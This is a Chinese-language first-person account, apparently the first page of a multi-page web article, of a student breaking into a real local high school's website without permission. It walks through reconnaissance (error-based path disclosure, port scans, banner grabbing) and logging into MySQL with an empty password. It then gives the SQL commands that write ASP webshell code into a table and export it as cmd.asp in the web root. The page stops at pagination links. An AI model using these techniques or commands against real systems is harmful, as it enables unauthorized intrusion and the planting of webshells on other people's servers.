网上有许多文章和帖子都是讲入侵的，但里面所叙述的入侵大多都过于简单，一般就是拿着傻瓜化的工具，输几个字母或按几下鼠标就进去了，难道这就是所谓的入侵么？不，真正的入侵可没这么简单，不是随便利用一些教程的方法去套就能进去的，入侵是门艺术，要做好这么艺术，需要的是智慧和永不放弃的精神，更需要有精明的头脑，灵活的运用已知的一些信息，入侵可不是三两下子就能完成的，1天，1个星期都有可能，好了，不讲大道理了，来看看俺入侵的经历吧。
一天在上了本地一个重点高中的网站，听说这个学校的计算机很厉害，也是本人心仪以久的中学（没办法，初3了……），但是我习惯性的在一个新闻后面输入：
http://host/home/xwzx/xwzxfile.php?id=53\
于是入侵就这样开始了……

1，信息收集与分析：
输入完后出现了下面的字：
Warning: Supplied argument is not a valid MySQL result resource in D:\\wangzhan\\home\\xwzx\\xwzxfile.php on line 191
这一行字真让我欣喜不以，它不仅暴露出了网站的数据库是MYSQL的，还显示出了网站的物理路径。接着我拿出X-WAY扫了它的IP，发现只开了21，445，80，3306端口，很有可能装了防火墙或是端口过滤，扫描了CGI等漏洞，并没有发现什么有价值的漏洞，仔细看看者个网站的模版，并不象是现成的，很有可能是自己编的，仔细分析下来已经有了3个突破口：
1，21端口，FTP IP 21，得到BANNER是Serv-U的FTP服务，好象Serv-U并没有什么可以直接利用远程得到密码漏洞，不过可以暴力破解，是一个安全隐患。

2，80端口，既然页面是可以交互的PHP，接着我注意到下面有个网站管理的入口，管理员并没有把它删掉，看来安全意识不强，很有可能用SQL注射攻入，不过我并会MYSQL注射，不过MSSQL和MYSQL都是SQL我想注射的方法也不会差太多，不过MYSQL没什么权限，但是只要能猜出页面管理员的入口的口令就差不多了，还值得一提的是网站还有个论坛，是紫桐的，版本不清楚，应该可以利用。

3，3306端口，MYSQL服务的端口，很有可能存在弱口令，就算没有也可以用MYSQL暴力破解器来破解密码。

telnet ip 80
get
得到的banner是IIS5.0，看来主机是iis5.0+php+mysql

3，攻击开始：

首先试试成功几率最大的MYSQL吧，下载了一个牛族MYSQL连接器，输入对方IP，密码为空，点“开始连接”。结果非常另人激动，那就是成功的连上去了，看来这所学校不是很重视网络安全，本以为接下来的事会很简单，但事与愿违，我又遇到了更复杂的情况。
有了MYSQL空密码以后的一般思路就是：先建立一个表，接着一行一行把ASP后门的代码写进去，接着导出，这样就变成了WEBSHELL，最后就是提升权限，用牛族连上去后，我就开始实现上面的思路，先在上面的框框里输入：
use mysql;
发送命令
“发送use mysal;成功！”
create table tmp(cmd TEXT)
发送命令
“发送create table tmp(cmd TEXT)成功！”

说明：选择在名叫mysql的库中建一个名叫tmp的表，这个表只有一个字段名叫cmd，数据类型为TEXT

再生成的表中写入内容并导出到系统目录上然后删除键的表
insert into tmp values(\"<% Dim oscript\")
发送命令（成功）
insert into tmp values(\"Dim oscriptNet\")
发送命令（成功）
insert into tmp values(\"Dim oFileSys, oFile\")
发送命令（成功）
……
……
select * from tmp into outfile \"d:\\\\wangzhan\\\\home\\cmd.asp\"
drop table tmp
说明：其实我就是一行一行往TMP这个表里写入cmd.asp的内容，代码如下：
<% Dim oscript
Dim oscriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

[1] [2] [3] [4] [5] 下一页